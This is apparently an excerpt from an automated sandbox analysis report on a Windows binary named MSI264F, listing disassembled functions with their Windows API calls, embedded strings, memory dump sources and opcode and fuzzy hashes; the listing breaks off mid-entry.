                                                                                                                        • Instruction ID: 978bd925ff4c371f917d1c67138c68a6245e790ae120bdc5284490bf96ff6c68
                                                                                                                        • Opcode Fuzzy Hash: a4d1104b9d2c37e82226c33ef9dbc6e9cff17487b433d657eabee38cb442f00e
                                                                                                                        • Instruction Fuzzy Hash: 7A010472E002086BDB00EFE49D46EAE77E9DB44700F504159F905AB2A1EEB5A914CBD6
                                                                                                                        Function 00AE41F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00AE41FD
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE422A
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00AE4237
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AE424B
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00AE4256
                                                                                                                        Strings
                                                                                                                        • ..\CTL32\Config.cpp, xrefs: 00AE420D
                                                                                                                        • (idata->flags & CFG_VOLATILE) == 0, xrefs: 00AE4212
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$DeleteEnter__wcsicoll
                                                                                                                        • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp
                                                                                                                        • API String ID: 3618949854-2091732786
                                                                                                                        • Opcode ID: 82fa9bc3bf3dedf64f742d785b2451db2a1d26218a579fc1c104e07098e9ac36
                                                                                                                        • Instruction ID: 6eadaa6f5cb82a9d0cebffb8f6f2438835e2b8fb3bdd9a326b3bd95ad38e53a9
                                                                                                                        • Opcode Fuzzy Hash: 82fa9bc3bf3dedf64f742d785b2451db2a1d26218a579fc1c104e07098e9ac36
                                                                                                                        • Instruction Fuzzy Hash: 1AF02873104208AFD6109B64FC85EE6B3FCEB98B55F00412AFA05D3182DBBAA805C760
                                                                                                                        Function 00B06360 Relevance: 12.1, APIs: 8, Instructions: 129fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,08000080,00000000), ref: 00B063A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: a7b151a32f0e79e87000c4fe42cacd9ab05d9705186b6bc59f84b2a4b2712aaf
                                                                                                                        • Instruction ID: 11655469c844afba114dbd561abba7ef027a3b902f1b0ea45d78c907ef832e9e
                                                                                                                        • Opcode Fuzzy Hash: a7b151a32f0e79e87000c4fe42cacd9ab05d9705186b6bc59f84b2a4b2712aaf
                                                                                                                        • Instruction Fuzzy Hash: A5418172A00205ABCB24DFA8DC85BAEB7F9EF84710F10455AF546D72D0DEB4A910CB95
                                                                                                                        Function 00B2495B Relevance: 12.1, APIs: 8, Instructions: 120registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B24983
                                                                                                                        • _malloc.LIBCMT ref: 00B2496F
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • _malloc.LIBCMT ref: 00B24999
                                                                                                                        • _memset.LIBCMT ref: 00B249A8
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000080,00000000,00000000,00000000,?), ref: 00B24A89
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B24AAD
                                                                                                                        • _free.LIBCMT ref: 00B24AC5
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B24AD9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc_memset$AllocateCloseDeleteEnumHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2592783467-0
                                                                                                                        • Opcode ID: 760de39d5f6d8726ba8eb6f0654448280bb45ac277642b1b1a8855984ed6cc5e
                                                                                                                        • Instruction ID: 6d96e8af993d27ce9d3c1d4081342ca3bbbb7121bd6b9d5630fd5f5e867f6579
                                                                                                                        • Opcode Fuzzy Hash: 760de39d5f6d8726ba8eb6f0654448280bb45ac277642b1b1a8855984ed6cc5e
                                                                                                                        • Instruction Fuzzy Hash: 30419471A412289BCB219B58DC517EB73F9EF89710F1441D4E90EA7681DBB45F80CF90
                                                                                                                        Function 00B14910 Relevance: 12.1, APIs: 8, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 00B14930
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B14943
                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B14963
                                                                                                                        • _malloc.LIBCMT ref: 00B14972
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00B14990
                                                                                                                        • _free.LIBCMT ref: 00B149A0
                                                                                                                          • Part of subcall function 00B379A7: HeapFree.KERNEL32(00000000,00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379BD
                                                                                                                          • Part of subcall function 00B379A7: GetLastError.KERNEL32(00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379CF
                                                                                                                        • VerQueryValueW.VERSION(?,00B6A1FC,?,?,?,?,00000000,00000000), ref: 00B149D1
                                                                                                                        • _free.LIBCMT ref: 00B149F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$HeapInfoModuleVersion_free$AllocateErrorFreeHandleLastNameQuerySizeValue_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1929493397-0
                                                                                                                        • Opcode ID: 01ac9c34544ae9f7c1e1907bcb81619662bddf7021932243ba0b7c9e492cbf51
                                                                                                                        • Instruction ID: 857668e35dd9bf1f9494f24b344777e218d560dd5094d114ff8ca59ffd322da1
                                                                                                                        • Opcode Fuzzy Hash: 01ac9c34544ae9f7c1e1907bcb81619662bddf7021932243ba0b7c9e492cbf51
                                                                                                                        • Instruction Fuzzy Hash: AA2185B2940218ABCB20DF68DC85FDAB3F8EF54310F1046D9E80997241DA70AE54CB91
                                                                                                                        Function 00B13080 Relevance: 12.1, APIs: 8, Instructions: 70windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00B1308B
                                                                                                                        • GetSubMenu.USER32(?,00000000), ref: 00B130A8
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00B130C9
                                                                                                                        • GetMenuItemID.USER32(?,00000001), ref: 00B130D2
                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00B130DC
                                                                                                                        • DeleteMenu.USER32(?,00000001,00000400), ref: 00B130F2
                                                                                                                        • GetMenuItemID.USER32(?,00000001), ref: 00B130FA
                                                                                                                        • DeleteMenu.USER32(?,-00000001,00000400), ref: 00B13111
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$Delete$Count
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1985338998-0
                                                                                                                        • Opcode ID: 71818621b49bd59043d871a9e30675de3fb9a627d02a5920db0312e7c69a1fff
                                                                                                                        • Instruction ID: c83835089759b5a808f31285c5e7d0d14e34ccac2fc2831c7cc3ff42b073f43c
                                                                                                                        • Opcode Fuzzy Hash: 71818621b49bd59043d871a9e30675de3fb9a627d02a5920db0312e7c69a1fff
                                                                                                                        • Instruction Fuzzy Hash: FD118175800204BBEB119B64DCC9EFFB7FCEF55B14F504099E505A2141FBB49A85CA61
                                                                                                                        Function 00B20C30 Relevance: 10.7, APIs: 7, Instructions: 182COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B20CD3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B20CE8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1338273076-0
                                                                                                                        • Opcode ID: d6e54fd7bffa6caca103ece4e969b1ae7059c30ec8f6b63574c28c09de691c8e
                                                                                                                        • Instruction ID: be84fb0fb925f1a67d9b12a308cb7e9bc2db7b74e802e551cbb7774fc40fb412
                                                                                                                        • Opcode Fuzzy Hash: d6e54fd7bffa6caca103ece4e969b1ae7059c30ec8f6b63574c28c09de691c8e
                                                                                                                        • Instruction Fuzzy Hash: AC61A9B1D016189FCB10EFA4D845B9EBBF8FF48710F1045ADE819A7391EB749904CB91
                                                                                                                        Function 00B18BC0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B18C1C
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 00B18C5F
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 00B18CB7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderPath$FileModuleName
                                                                                                                        • String ID: ..\CTL32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                        • API String ID: 906376703-468948282
                                                                                                                        • Opcode ID: 3f229982ed88dfa0eeb103f2cc76e26e5db8432e6bde48951a0c04c35931bad0
                                                                                                                        • Instruction ID: 870ca17790f5ec1cca47bbcdb5fbac1098483c8ea915ecd52d1619f425612b09
                                                                                                                        • Opcode Fuzzy Hash: 3f229982ed88dfa0eeb103f2cc76e26e5db8432e6bde48951a0c04c35931bad0
                                                                                                                        • Instruction Fuzzy Hash: B64126B190120997CB24AB249C56BEB73E8FF90310F6482F4ED19A72D1EE745A90CB95
                                                                                                                        Function 00B24050 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 118COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000100), ref: 00B2408E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryWindows
                                                                                                                        • String ID: .lnk$\Profiles\All Users\Start Menu\Programs\$rb+
                                                                                                                        • API String ID: 3619848164-1848683015
                                                                                                                        • Opcode ID: 293752fe5b3afad60b03c5356d7baf3491c0d239ce3492cf060ec8ab3aa85410
                                                                                                                        • Instruction ID: 96551c122fc540ae12adaed33ffaa3c7aff0b75594477ee8e5c3e130dd4563c7
                                                                                                                        • Opcode Fuzzy Hash: 293752fe5b3afad60b03c5356d7baf3491c0d239ce3492cf060ec8ab3aa85410
                                                                                                                        • Instruction Fuzzy Hash: 10310471A042199BCB20EB64DD56BDBB3F5EF84320F1081D9EA0E9B381EFB05950CB80
                                                                                                                        Function 00B32800 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 118libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B3284C
                                                                                                                        • DeleteAce.ADVAPI32(00000104,00000000), ref: 00B328B6
                                                                                                                        • GetProcAddress.KERNEL32(00000104,SetNamedSecurityInfoW), ref: 00B328D7
                                                                                                                        • LocalFree.KERNEL32(?), ref: 00B3291E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$DeleteFreeLocal
                                                                                                                        • String ID: GetNamedSecurityInfoW$SetNamedSecurityInfoW
                                                                                                                        • API String ID: 1412278368-2573761906
                                                                                                                        • Opcode ID: 1bb71a5f2fccd86f5c56858db2a9652344aa9efa90ae55890eff6d3acc5f0ef7
                                                                                                                        • Instruction ID: 46935e0e1f2a9d4d6c44ad92ef3cfa97cf5aacf390e134c82d01927fee4f7a8e
                                                                                                                        • Opcode Fuzzy Hash: 1bb71a5f2fccd86f5c56858db2a9652344aa9efa90ae55890eff6d3acc5f0ef7
                                                                                                                        • Instruction Fuzzy Hash: 873146B5A40304ABDB20DF58CC85F9AB7E8EF44751F2084A9F944EB2C1D6B4ED40CB90
                                                                                                                        Function 00AF2B40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2B59
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2B7A
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2B98
                                                                                                                        • _memmove.LIBCMT ref: 00AF2C0F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                        • API String ID: 443534600-4289949731
                                                                                                                        • Opcode ID: 0a2178be45f1c0c84c7615fb306b9f70f960e67a8b0d215b1ba8186556ee2c99
                                                                                                                        • Instruction ID: 8bb4deb9baa7aaae9edd4f674927d88c14f42dc32b2e43987c5b6f76ac5bc28c
                                                                                                                        • Opcode Fuzzy Hash: 0a2178be45f1c0c84c7615fb306b9f70f960e67a8b0d215b1ba8186556ee2c99
                                                                                                                        • Instruction Fuzzy Hash: 9A3181323042198B8724DFEDE880E7AB3E6FFD47213104A6EFA56CB650DB70D94587A4
                                                                                                                        Function 00AEA0D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(newdev.dll,5E06C67B), ref: 00AEA123
                                                                                                                        • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesW), ref: 00AEA135
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AEA146
                                                                                                                        • GetLastError.KERNEL32 ref: 00AEA1DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressErrorFreeLastLoadProc
                                                                                                                        • String ID: UpdateDriverForPlugAndPlayDevicesW$newdev.dll
                                                                                                                        • API String ID: 2540614322-3767700378
                                                                                                                        • Opcode ID: d1f034a7b595d3e430026b269c56444134351e7437b188dd18c07dba325a9695
                                                                                                                        • Instruction ID: 3e2e8e2b1d53d377ca52183655a01de42c931c122d4a59034976b8d5ff3f4b64
                                                                                                                        • Opcode Fuzzy Hash: d1f034a7b595d3e430026b269c56444134351e7437b188dd18c07dba325a9695
                                                                                                                        • Instruction Fuzzy Hash: 0C417175A006199FCB24DF29CC84BAAB7F5FF88710F108299E91997390DB749E41CF51
                                                                                                                        Function 00B04C20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00B04C71
                                                                                                                        • _free.LIBCMT ref: 00B04C8C
                                                                                                                          • Part of subcall function 00B379A7: HeapFree.KERNEL32(00000000,00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379BD
                                                                                                                          • Part of subcall function 00B379A7: GetLastError.KERNEL32(00000000,?,00B42B7C,00000000,?,00B097EE,00000000), ref: 00B379CF
                                                                                                                        • _malloc.LIBCMT ref: 00B04C9E
                                                                                                                        • RegQueryValueExW.ADVAPI32(000007FE,?,00000000,?,00000000,000007FE), ref: 00B04CCC
                                                                                                                        • _free.LIBCMT ref: 00B04D60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                                                        • String ID: Error %d getting %s
                                                                                                                        • API String ID: 582965682-2709163689
                                                                                                                        • Opcode ID: c5ab1fbd6266354aad3acc7b03edd95cf6d8a59ffa071e6f6169dc8141d52657
                                                                                                                        • Instruction ID: 3aebec0109c9cebb38532e2eb757ed52dc4cdd047e5b50836de2c0650db1367a
                                                                                                                        • Opcode Fuzzy Hash: c5ab1fbd6266354aad3acc7b03edd95cf6d8a59ffa071e6f6169dc8141d52657
                                                                                                                        • Instruction Fuzzy Hash: F23162B19001289BDB64DB18CC85BAEB7F9FF85300F04C5E9E549A7290DF745E858BD1
                                                                                                                        Function 00AF31D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF31E6
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF31FC
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF3217
                                                                                                                        • _memmove.LIBCMT ref: 00AF3282
